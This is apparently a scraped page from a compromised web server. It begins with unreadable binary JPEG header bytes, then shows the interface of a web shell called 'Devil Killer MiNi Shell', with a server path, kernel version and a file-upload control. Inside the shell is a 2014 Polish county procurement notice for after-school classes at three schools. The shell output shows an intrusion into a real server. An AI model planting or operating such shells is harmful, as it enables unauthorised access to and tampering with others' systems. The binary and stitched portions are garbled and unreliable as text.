JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141001/207673-N-2014.html

<p class="kh_header"><b>Sępólno Krajeńskie: Realizacja dodatkowych zajęć pozalekcyjnych dla młodzieży w ramach projektu Mój start w życie zawodowe IV</b><br>
<b>Numer ogłoszenia: 207673 - 2014; data zamieszczenia: 01.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Sępólnie Krajeńskim , ul. Kościuszki 11, 89-400 Sępólno Krajeńskie, woj. kujawsko-pomorskie, tel. 052 3881300, faks 052 3881303.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja dodatkowych zajęć pozalekcyjnych dla młodzieży w ramach projektu Mój start w życie zawodowe IV.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa szkoleniowa polegająca na przeprowadzeniu dodatkowych zajęć pozalekcyjnych dla młodzieży w ramach projektu Mój start w życie zawodowe IV. 
2. Zajęcia będą odbywać się na terenie szkół wymienionych w pkt.9.1; 9.2; 9.3, zgodnie z harmonogramem stanowiącym załącznik nr 8 ustalonym przez Zamawiającego, w oparciu o opracowane przez Wykonawcę programy zajęć uwzględniające wymagania określone w SIWZ.
3. Dodatkowe zajęcia pozalekcyjne dla młodzieży obejmują:
3.1 Zajęcia edukacyjne z zakresu przedsiębiorczości. Celem zajęć jest przygotowanie uczniów do wejścia na rynek pracy. Zajęcia prowadzone będą w okresie XI 2014 r.- II 2015 r., w systemie np. 1x2h tygodniowo- łącznie 20h/grupę (8 h w 2014 r. i 12 h w 2015 r.), w grupach 8 osobowych. W ramach każdej grupy Wykonawca zorganizuje min. po 2 wizyty (każda trwająca 2 h) w przedsiębiorstwach przybliżające możliwość poznania specyfiki pracy różnych branż i zawodów oraz po 1 spotkaniu (trwającym 2h) z Przedsiębiorcą w celu wskazywania pozytywnych wzorców w zakresie podejmowania własnej działalności gospodarczej. Wyboru przedsiębiorstw z terenu województwa kujawsko- pomorskiego dokona Prowadzący zajęcia w uzgodnieniu ze Szkolnym Koordynatorem Projektu pod kątem kierunków kształcenia uczniów.
3.2 Zajęcia indywidualnego doradztwa zawodowego w wymiarze 3h/osobę obejmującego elementy doradztwa w zakresie zakładania i prowadzenia własnej działalności gospodarczej dla 35 uczniów oraz doradztwa edukacyjno- zawodowego związanego z wyborem dalszych kierunków kształcenia ze szczególnym uwzględnieniem nauk ścisłych i technicznych dla 30 uczniów, w okresie X 2014 - V 2015 r. Podczas indywidualnych spotkań z doradcą wypracowane zostaną scenariusze edukacyjno- zawodowe przekazane uczniom na zakończenie zajęć.
3.3 Zajęcia z zakresu umiejętności interpersonalnych. Celem zajęć jest przygotowanie uczniów do wejścia na rynek pracy. Zajęcia prowadzone będą w okresie XI 2014 r.- III 2015 r., w systemie np. 1x2h tygodniowo - łącznie 30h/grupę (10 h w 2014 r. i 20 h w 2015r.), w grupach 8 osobowych.
3.4 Zajęcia specjalistyczne mechaniczne i kelnersko-gastronomiczne - warsztatowe w  pracowniach szkolnych. Zajęcia prowadzone będą w okresie X 2014 r- VI 2015 r. w systemie np. 1x2h tygodniowo - łącznie 50h/grupę (16 h w 2014 r. i 34 h w 2015r.), w grupach 5 osobowych. Celem zajęć jest przygotowanie uczniów do wejścia na rynek pracy.
3.5 Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych. Celem zajęć jest podniesienie efektywności kształcenia w szkole. Zajęcia prowadzone będą w okresie X 2014 - VI 2015 r. w systemie np. 1x2h tygodniowo - łącznie 40h/grupę, w grupach 8 osobowych.
3.6 Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych. Celem zajęć jest podniesienie efektywności kształcenia w szkole. Zajęcia prowadzone będą w okresie X 2014 - IV 2015 r. w systemie np. 1x2h tygodniowo - łącznie 40h/grupę, w grupach 8 osobowych.
3.7 Zajęcia ukierunkowane na rozwój kompetencji kluczowych. Celem zajęć jest podniesienie efektywności kształcenia w szkole. Zajęcia prowadzone będą w okresie X 2014 - VI 2015 r. w systemie np. 1x2h tygodniowo - łącznie 50h/grupę (16 h w 2014 r. i 34 h w 2015r.), w grupach 8 osobowych.
3.8 Indywidualne zajęcia wsparcia pedagogiczno- psychologicznego w wymiarze 5h/osobę. Prowadzący we współpracy z Wychowawcą opracuje i wprowadzi indywidualną ścieżkę wsparcia wobec ucznia, u którego zdiagnozowano taką potrzebę. Celem zajęć jest wzmocnienie opieki pedagogiczno- psychologicznej nad uczniami zagrożonymi przedwczesnym wypadnięciem z systemu szkolnictwa. Zajęcia winny się odbyć w okresie X 2014 - VI 2015 r
4. Zajęcia powinny odbywać się (godz. dydaktyczna trwa 45 min.) od poniedziałku do piątku po zajęciach lekcyjnych. Pomiędzy każdą godziną lekcyjną należy uwzględnić przerwę trwającą ok. 5 min. Czas przerwy nie jest wliczany do czasu zajęć. Zajęcia mogą być realizowane w trybie weekendowym (soboty - niedziele) tylko w porozumieniu z Zamawiającym i Dyrektorem szkoły. 
5. Szczegółowy harmonogram  zajęć ustali Wykonawca w porozumieniu z Zamawiającym zgodnie z ramowym harmonogramem zajęć stanowiącym załącznik nr 8 do SIWZ oraz pkt. 3.1 - 3.8. Ustalony szczegółowy harmonogram zajęć może być zmieniony tylko na wniosek Dyrektora szkoły, w której odbywają się zajęcia, ze względu na potrzeby szkoły (np. zmiany w planie zajęć obowiązkowych) albo na wniosek Wykonawcy, jednak tylko ze względu na wypadki losowe (np. choroba Prowadzącego zajęcia). 
6. Zamawiający nie dopuszcza możliwości wymiany zgłoszonych wykładowców na innych niż określonych w zał. nr 3 SIWZ. Jedynym odstępstwem od powyższej reguły może być udokumentowane zdarzenie losowe, którego nie można było przewidzieć. W takim wypadku zmiana może zostać dokonana wyłączenie za zgodą Zamawiającego, po przedstawieniu stosownych dokumentów dotyczących wykładowcy zastępczego tj. Wykładowca musi posiadać takie same lub lepsze kwalifikacje zawodowe od wykładowcy zgłoszonego w oświadczeniu - zał. nr 3 SIWZ.
7. Materiały biurowe do realizacji zajęć zabezpiecza Zamawiający. Zamawiający zastrzega sobie prawo do kontroli, hospitacji i oceny jakości prowadzonych zajęć przez Wykonawcę. Hospitacji będzie dokonywała osoba posiadająca odpowiednie kwalifikacje i wyznaczona przez Zamawiającego.
8. Wykonawca zobowiązany jest w szczególności do:
przeprowadzenia zajęć dla uczniów w miejscu i terminach uzgodnionych z Zamawiającym,
dołożenia wszelkich starań, ażeby zajęcia prowadzone były na najwyższym poziomie, stwarzając tym samym uczestnikom optymalne warunki do nauki. Wykonawca powinien również motywować uczestników do nauki tak aby zapewnić pełną frekwencję na zajęciach,
bieżącego sprawdzania listy uczestników obecnych na zajęciach. Uczestnicy zobowiązani są do dokumentowania swojej obecności podpisem. Listy obecności Wykonawca przekazuje w wyznaczonych terminach Zamawiającemu,
dopilnowania, aby podczas każdych zajęć sala lekcyjna zaopatrzona była w odpowiedni plakat informujący, że szkolenie finansowane jest ze środków Europejskiego Funduszu Społecznego, w ramach POKL. Plakat informacyjny dostarcza Zamawiający,
prowadzenia Dziennika zajęć określającego tematykę prowadzonych zajęć na podstawie opracowanego przez Wykonawcę programu zajęć. Dziennik dostarcza Zamawiający. Po zakończeniu całego cyklu zajęć, w ciągu 5 dni roboczych Wykonawca musi przekazać Zamawiającemu uzupełniony dziennik zajęć, listy obecności itp.
przestrzegania punktualnego rozpoczynania i kończenia zajęć. Niezwłocznego informowania Zamawiającego o każdym spóźnieniu. W przypadku spóźnienia - do odpracowania czasu w terminie uzgodnionym z grupą i Zamawiającym,
uczestnictwa w kontrolach przeprowadzonych przez uprawnione podmioty, udostępniania dokumentacji i udzielania niezbędnych informacji,
przeprowadzenia na zlecenie Zamawiającego ankietowego pomiaru jakości szkoleń Pomiar 1- lub 2 -krotny w zależności od długości formy wsparcia. Druki ankiet dostarczy Zamawiający.
przygotowania i przeprowadzenia testów kompetencji dwukrotnie (na początku i końcu zajęć), wśród uczestników oraz dokonania analizy wyników tych testów i przekazanie ich Zamawiającemu.

9. Przedmiot zamówienia podzielony został na 54 odrębne zadania, różniących się miejscem przeprowadzenia zajęć oraz rodzajem zajęć z których każde stanowi odrębną część zamówienia.
9.1 Dodatkowe zajęcia pozalekcyjne dla młodzieży w Zespole Szkół Ponadgimnazjalnych,  
       ul. Przemysłowa 15, 89-400 Sępólno Krajeńskie
9.1.1 Część I - Zajęcia edukacyjne z zakresu przedsiębiorczości dla 1 grupy (20h)
9.1.2 Część II- Zajęcia edukacyjne z zakresu przedsiębiorczości dla 1 grupy (20h)
9.1.3 Część III- Zajęcia indywidualnego doradztwa zawodowego dla 20 osób (60h)
9.1.4 Część IV- Zajęcia z zakresu umiejętności interpersonalnych dla 1 grupy (30h)
9.1.5 Część V- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych 
9.1.6 Część VI- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych 
9.1.7 Część VII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych - język polski, dla 1 grupy (40h)
9.1.8 Część VIII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych 
-matematyka,  dla 1 grupy (40h)
9.1.9 Część IX- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych -język niemiecki ,  dla 1 grupy (40h)
9.1.10 Część X- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- język angielski,  dla 1 grupy (40h) 
9.1.11 Część XI- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie technik drogownictwa  dla 1 grupy (40h)
9.1.12 Część XII- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- matematyka dla 1 grupy (50h)
9.1.13 Część XIII- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- geografia dla 1 grupy (50h)
9.1.14 Część XIV- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- ICT dla 1 grupy (50h)
9.1.15 Część XV- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- język rosyjski  dla 1 grupy (50h)
9.1.16 Część XVI- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- matematyka dla 1 grupy (50h)
9.1.17 Część XVII Indywidualne zajęcia wsparcia pedagogiczno- psychologicznego dla 20 osób (100h)
9.2 Dodatkowe zajęcia pozalekcyjne dla młodzieży w Centrum Kształcenia Zawodowego i Ustawicznego, ul. Pocztowa 14b, 89-410 Więcbork,
9.2.1 Część XVIII- Zajęcia edukacyjne z zakresu przedsiębiorczości dla 1 grupy (20h)
9.2.2 Część XIX- Zajęcia indywidualnego doradztwa zawodowego dla 30 osób (90h)
9.2.3 Część XX- Zajęcia z zakresu umiejętności interpersonalnych dla 1 grupy (30h)
9.2.4 Część XXI- Zajęcia z zakresu umiejętności interpersonalnych dla 1 grupy (30h)
9.2.5 Część XXII- Zajęcia specjalistyczne kelnersko-gastronomiczne- warsztatowe w pracowni szkolnej dla 1 grupy (50h)
9.2.6 Część XXIII- Zajęcia specjalistyczne kelnersko-gastronomiczne- warsztatowe w  pracowni szkolnej dla 1 grupy (50h)
9.2.7 Część XXIV- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie technik ekonomista  dla 1 grupy (40h)
9.2.8 Część XXV- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie technik informatyk  dla 1 grupy (40h)
9.2.9 Część XXVI- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie technik hotelarstwa  dla 1 grupy (40h)
9.2.10 Część XXVII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie sprzedawca  dla 1 grupy (40h)
9.2.11 Część XXVIII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- j. polski,  dla 1 grupy (40h)
9.2.12 Część XXIX- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- matematyka,  dla 1 grupy (40h)
9.2.13 Część XXX- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- j. angielski,  dla 1 grupy (40h)
9.2.14 Część XXXI- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- j. niemiecki,  dla 1 grupy (40h) 
9.2.15 Część XXXII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- j. polski,  dla 1 grupy (40h)
9.2.16 Część XXXIII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- j. niemiecki,  dla 1 grupy (40h)
9.2.17 Część XXXIV- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- matematyka dla 1 grupy (50h)
9.2.18 Część XXXV- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- geografia dla 1 grupy (50h)
9.2.19 Część XXXVI- Zajęcia ukierunkowane na rozwój kompetencji kluczowych
- j. angielski dla 1 grupy (50h)
9.2.20 Część XXXVII- Zajęcia ukierunkowane na rozwój kompetencji kluczowych
- j. niemiecki dla 1 grupy (50h)
9.2.21 Część XXXVIII- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- przedmioty informatyczne dla 1 grupy (50h)
9.2.22 Część XXXIX Indywidualne zajęcia wsparcia pedagogiczno- psychologicznego dla 30 osób (150h)
9.3 Dodatkowe zajęcia pozalekcyjne dla młodzieży  w Zespole Szkół Centrum Kształcenia Rolniczego, ul. Kwiatowa 3, 89-422 Sypniewo,
9.3.1 Część XL- Zajęcia edukacyjne z zakresu przedsiębiorczości dla 1 grupy (20h)
9.3.2 Część XLI- Zajęcia indywidualnego doradztwa zawodowego dla 15 osób (45h)
9.3.3 Część XLII- Zajęcia z zakresu umiejętności interpersonalnych dla 1 grupy (30h) 
9.3.4 Część XLIII- Zajęcia specjalistyczne mechaniczne- warsztatowe w  pracowni szkolnej dla 1 grupy (50h) 
9.3.5 Część XLIV- Zajęcia specjalistyczne mechaniczne- warsztatowe w  pracowni szkolnej dla 1 grupy (50h)
9.3.6 Część XLV- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie technik rolnik  dla 1 grupy (40h)
9.3.7 Część XLVI- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie technik żywienia i usług gastronomicznych  dla 1 grupy (40h)
9.3.8 Część XLVII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów egzaminacyjnych zawodowych w zawodzie mechanik- operator pojazdów i maszyn rolniczych  dla 1 grupy (40h)
9.3.9 Część XLVIII- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- język polski,  dla 1 grupy (40h)
9.3.10 Część XLIX- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- matematyka ,  dla 1 grupy (40h)
9.3.11 Część L- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- język angielski,  dla 1 grupy (40h)
9.3.12 Część LI- Zajęcia dydaktyczno- wyrównawcze z przedmiotów maturalnych- geografia  dla 1 grupy (40h) 
9.3.13 Część LII- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- matematyka dla 1 grupy (50h)
9.3.14 Część LIII- Zajęcia ukierunkowane na rozwój kompetencji kluczowych- geografia dla 1 grupy (50h)
9.3.15 Część LIV Indywidualne zajęcia wsparcia pedagogiczno- psychologicznego dla 10 osób (50h).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 54.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia. 
Warunek uznaje się za spełniony, jeżeli Wykładowca posiada: 
- staż pracy pedagogicznej min.3 lata, w tym w szkole ponadgimnazjalnej min. 3 lata oraz minimalny stopień awansu zawodowego- nauczyciel kontraktowy;
- kwalifikacje do prowadzenia odpowiedniego rodzaju zajęć w szkole ponadgimnazjalnej zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną. 
2. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 Ustawy. Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika - w formie oryginału lub kopii poświadczonej notarialnie. 
